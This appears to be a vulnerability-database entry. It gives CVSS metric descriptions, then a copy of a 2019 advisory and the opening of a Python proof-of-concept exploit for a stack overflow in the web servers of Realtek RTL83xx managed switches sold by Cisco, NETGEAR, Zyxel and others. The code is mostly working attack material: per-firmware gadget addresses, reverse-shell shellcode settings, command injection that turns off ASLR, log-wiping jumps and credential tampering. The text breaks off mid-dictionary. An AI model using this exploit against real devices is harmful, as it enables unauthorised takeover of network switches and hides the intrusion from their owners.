The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Exploit Maturity
Unreported
E
Based on available threat intelligence each of the following must apply: No knowledge of publicly available proof-of-concept exploit code No knowledge of reported attempts to exploit this vulnerability No knowledge of publicly available solutions used to simplify attempts to exploit the vulnerability (i.e., neither the “POC” nor “Attacked” values apply)
Below is a copy: Realtek Managed Switch Controller RTL83xx Stack Overflow
[SOT]
[Subject]
Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)
https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller
[Brief description]
1.Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)
Note: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding
2.Reuse of code between vendors gives almost indentical exploitation of found vulnerabilities
3.Two strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian
[Goals for this PoC]
1.One Python PoC for all vendors
Using dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.
The python code will read and use details from dictionary when verifying/exploiting
2.Uniquely identify remote target
ETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware
ETag: xxxxx-yyyyy
xxxxx = file size (up to 5 digits)
yyyyy = last modified (up to 5 digits)
3.Reverse shell
MIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible
4.add/delete credentials for GUI/CLI
Quite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'
For those who has added protection, we can add/delete credentials with an bit interesting jumping sequence
[Technical brief]
1.Stack - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)
2.Heap - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)
3.fork - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell
Two vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,
this allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request
[Basically]
First buffer: [aaaaaaaa][0x58xxxxxx]('a' and 0x58 will be overwritten by second buffer)
Second buffer: [bbbbb][bbbbbbbb][0x00xxxxxx](NULL termination will overwrite 0x58)
[Known targets]
All below is fully exploitable, with following exception:
[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
Not because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,
and 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.
[They are still fully exploitable with the Boa/Hydra vulnerability]
Note:
In this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.
$ ./Realtek-RTL83xx-PoC.py --etag help
[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)
[*] RHOST: 192.168.57.20
[*] RPORT: 80
[*] LHOST: 192.168.57.1
[*] LPORT: 1337
[+] Target: List of known targets
[*] ETag: 225-51973 [Cisco Systems, Inc. Sx220 v1.1.3.1]
[*] ETag: 225-60080 [Cisco Systems, Inc. Sx220 v1.1.4.1]
[*] ETag: 752-76347 [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]
[*] ETag: 225-21785 [Pakedgedevice & Software Inc SX-8P v1.04]
[*] ETag: 222-71560 [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]
[*] ETag: 14044-509 [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]
[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]
[*] ETag: 218-22429 [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]
[*] ETag: 218-7473 [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]
[*] ETag: 752-95168 [DrayTek Corp. VigorSwitch P1100 v2.1.4]
[*] ETag: 225-96283 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]
[*] ETag: 225-63242 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]
[*] ETag: 224-5061 [CERIO Corp. CS-2424G-24P v1.00.29]
[*] ETag: 222-50100 [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]
[*] ETag: 222-81176 [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]
[*] ETag: 8028-89928 [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]
[*] ETag: 222-64895 [Xhome DownLoop-G24M v3.0.0.43126]
[*] ETag: 222-40570 [Realtek RTL8380-24GE-4GEC v3.0.0.43126]
[*] ETag: 222-45866 [Abaniact AML2-PS16-17GP L2 v116B00033]
[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]
[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]
[*] ETag: 609-31457 [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]
[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
[*] All done...
[Other vendors]
These names have been found within some Firmware images, but not implemented as I have not found any Firmware images.
(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')
[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power
[Known bugs]
1.Non-JSON:
'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'
(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)
[Responsible Disclosure]
Working with VDOO since early February 2019 to disclosure found vulnerabilities to vendors
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
PoC:
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
Have a nice day
/bashis
[EOT]
Realtek-RTL83xx-PoC.py:
#!/usr/bin/python2.7
#
"""
[Subject]
Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)
https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller
[Brief description]
1.Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)
Note: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding
2.Reuse of code between vendors gives almost indentical exploitation of found vulnerabilities
3.Two strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian
[Goals for this PoC]
1.One Python PoC for all vendors
Using dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.
The python code will read and use details from dictionary when verifying/exploiting
2.Uniquely identify remote target
ETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware
ETag: xxxxx-yyyyy
xxxxx = file size (up to 5 digits)
yyyyy = last modified (up to 5 digits)
3.Reverse shell
MIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible
4.add/delete credentials for GUI/CLI
Quite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'
For those who has added protection, we can add/delete credentials with an bit interesting jumping sequence
[Technical brief]
1.Stack - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)
2.Heap - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)
3.fork - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell
Two vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,
this allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request
[Basically]
First buffer: [aaaaaaaa][0x58xxxxxx]('a' and 0x58 will be overwritten by second buffer)
Second buffer: [bbbbb][bbbbbbbb][0x00xxxxxx](NULL termination will overwrite 0x58)
[Known targets]
All below is fully exploitable, with following exception:
[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
Not because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,
and 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.
[They are still fully exploitable with the Boa/Hydra vulnerability]
Note:
In this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.
$ ./Realtek-RTL83xx-PoC.py --etag help
[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)
[*] RHOST: 192.168.57.20
[*] RPORT: 80
[*] LHOST: 192.168.57.1
[*] LPORT: 1337
[+] Target: List of known targets
[*] ETag: 225-51973 [Cisco Systems, Inc. Sx220 v1.1.3.1]
[*] ETag: 225-60080 [Cisco Systems, Inc. Sx220 v1.1.4.1]
[*] ETag: 752-76347 [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]
[*] ETag: 225-21785 [Pakedgedevice & Software Inc SX-8P v1.04]
[*] ETag: 222-71560 [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]
[*] ETag: 14044-509 [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]
[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]
[*] ETag: 218-22429 [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]
[*] ETag: 218-7473 [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]
[*] ETag: 752-95168 [DrayTek Corp. VigorSwitch P1100 v2.1.4]
[*] ETag: 225-96283 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]
[*] ETag: 225-63242 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]
[*] ETag: 224-5061 [CERIO Corp. CS-2424G-24P v1.00.29]
[*] ETag: 222-50100 [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]
[*] ETag: 222-81176 [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]
[*] ETag: 8028-89928 [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]
[*] ETag: 222-64895 [Xhome DownLoop-G24M v3.0.0.43126]
[*] ETag: 222-40570 [Realtek RTL8380-24GE-4GEC v3.0.0.43126]
[*] ETag: 222-45866 [Abaniact AML2-PS16-17GP L2 v116B00033]
[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]
[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]
[*] ETag: 609-31457 [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]
[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
[*] All done...
[Other vendors]
These names have been found within some Firmware images, but not implemented as I have not found any Firmware images.
(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')
[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power
[Known bugs]
1.Non-JSON:
'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'
(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)
[Responsible Disclosure]
Working with VDOO since early February 2019 to disclosure found vulnerabilities to vendors
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
[Technical details]
Please read the code
"""
# Have a nice day
# /bashis
#
import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import hashlib
import re
import struct
import time
import thread
import json
import inspect
import copy
import hashlib
from Crypto.Cipher import AES
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto import Random
from random import randint
from pwn import * # pip install pwn
global debug
debug = False
global force
force = False
def DEBUG(direction, text):
if debug:
# Print send/recv data and current line number
print "[BEGIN {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
print "\n{}\n".format(text)
print "[ END {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
return
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, Raw):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
def Send(self, uri, query_headers, query_data,ID,encode_query):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
self.encode_query = encode_query
# Connect-timeout in seconds
#timeout = 5
#socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
log.info("[Verbose] Sending: {}".format(url))
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
#log.info("Creating SSL Unverified Context")
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
log.info("[Verbose] User: {}, Password: {}".format(Basic_Auth[0],Basic_Auth[1]))
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
log.info("Basic Auth Error: {}".format(e))
sys.exit(1)
if self.query_data:
#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
if self.query_data and self.encode_query:
request = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
else:
request = urllib2.Request(url, data=self.query_data, headers=self.query_headers)
if self.ID:
request.add_header('Cookie', self.ID)
else:
request = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
request.add_header('Cookie', self.ID)
response = urllib2.urlopen(request)
#if response:
#print "[<] {} OK".format(response.code)
if self.Raw:
return response
else:
html = response.read()
return html
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid FQDN name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
class Vendor:
def __init__(self, ETag):
self.ETag = ETag
def random_string(self,length):
self.length = length
return "a" * self.length
#return ''.join(random.choice(string.lowercase) for i in range(self.length))
#
# Source: https://gist.github.com/angstwad/bf22d1822c38a92ec0a9
#
def dict_merge(self, dct, merge_dct):
""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
updating only top-level keys, dict_merge recurses down into dicts nested
to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in merge_dct.iteritems():
if (k in dct and isinstance(dct[k], dict)
and isinstance(merge_dct[k], collections.Mapping)):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
#
# Difference between vendors and Firmware versions.
# The update code will search below and update the template on the fly
# (you can tweak and add code in the template from here)
#
# ETag - excellent tool for determine the target
#
# ETag: xxxxx-yyyyy
# xxxxx = file size (up to 5 digits)
# yyyyy = last modified (up to 5 digits)
#
def dict(self):
Vendor_ETag = {
#
# PLANET Technology Corp.
#
# CGI Reverse Shell : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log : No
# Add credentials : Yes
# Del credentials : Yes
#
'218-22429': {
'template':'Planet',# Static for the vendor
'version':'1.0b171116',# Version / binary dependent stuff
'model':'GS-4210-8P2S',# Model
'uri':'https://www.planet.com.tw/en/product/GS-4210-8P2S',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40E04C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x2484029c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'verify_uri':'/tmp/check',
'web_sys_ping_post':0x423B9C,# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()
# traceroute
#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
#'verify_uri':'/tmp/check',
#'web_sys_ping_post':0x4243FC,# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()
'log_settings_set':0x489368,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()
'log_ramClear':0x48AB84,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()
'log_fileClear':0x48C240,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x42DA80,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42DA80,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x42C868,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'START':0x7ffeee04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 45,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'218-7473': {
'template':'Planet',# Static for the vendor
'version':'2.0b160727',# Version / binary dependent stuff
'model':'GS-4210-24T2S',# Model
'uri':'https://www.planet.com.tw/en/product/GS-4210-24T2S',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40E04C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x2484029c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'verify_uri':'/tmp/check',
'web_sys_ping_post':0x424594,# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()
# traceroute
#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
#'verify_uri':'/tmp/check',
#'web_sys_ping_post':0x424DF4,# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()
'log_settings_set':0x48AA98,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()
'log_ramClear':0x48D9F4,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()
'log_fileClear':0x48D9F4,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x42E474,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42E474,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x42D25c,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'START':0x7ffeee04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 45,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
#
# Cisco Systems, Inc.
# Sx220 Series
#
# CGI Reverse Shell : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log : Yes
# Add credentials : Yes
# Del credentials : Yes
#
'225-51973': {
'template':'Cisco',# Static for the vendor
'version':'1.1.3.1',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40F70C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f998524,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x2484683c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_ping_set()
# Ping IPv4
'web_sys_ping_post':0x43535C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
'sys_ping_post_check':'',
# /sqfs/home/web/cgi/set.cgi; cgi_sys_tracert_set()
# traceroute
#'web_sys_ping_post':0x43567C,# Jump one after 'sw $ra'# (address, binary dependent)
#'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
#'sys_ping_post_check':'',
'verify_uri':'/tmp/check',
'vulnerable': True,#
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
'log_settings_set':0x436FDC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
'log_ramClear':0x436F34,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
'log_fileClear':0x436F88,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
'sys_timeSntp_set':0x434FB0,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x4350D8,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'225-60080': {
'template':'Cisco',# Static for the vendor
'version':'1.1.4.1',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40ffac,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f998530,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x24847b6c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_ping_set()
# Ping IPv4
'web_sys_ping_post':0x43535C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
'sys_ping_post_check':'',
# /sqfs/home/web/cgi/set.cgi; cgi_sys_tracert_set()
# traceroute
#'web_sys_ping_post':0x43567C,# Jump one after 'sw $ra'# (address, binary dependent)
#'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
#'sys_ping_post_check':'',
'verify_uri':'/tmp/check',
'vulnerable': True,#
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
'log_settings_set':0x436FDC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
'log_ramClear':0x436F34,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
'log_fileClear':0x436F88,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
'sys_timeSntp_set':0x434FB0,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
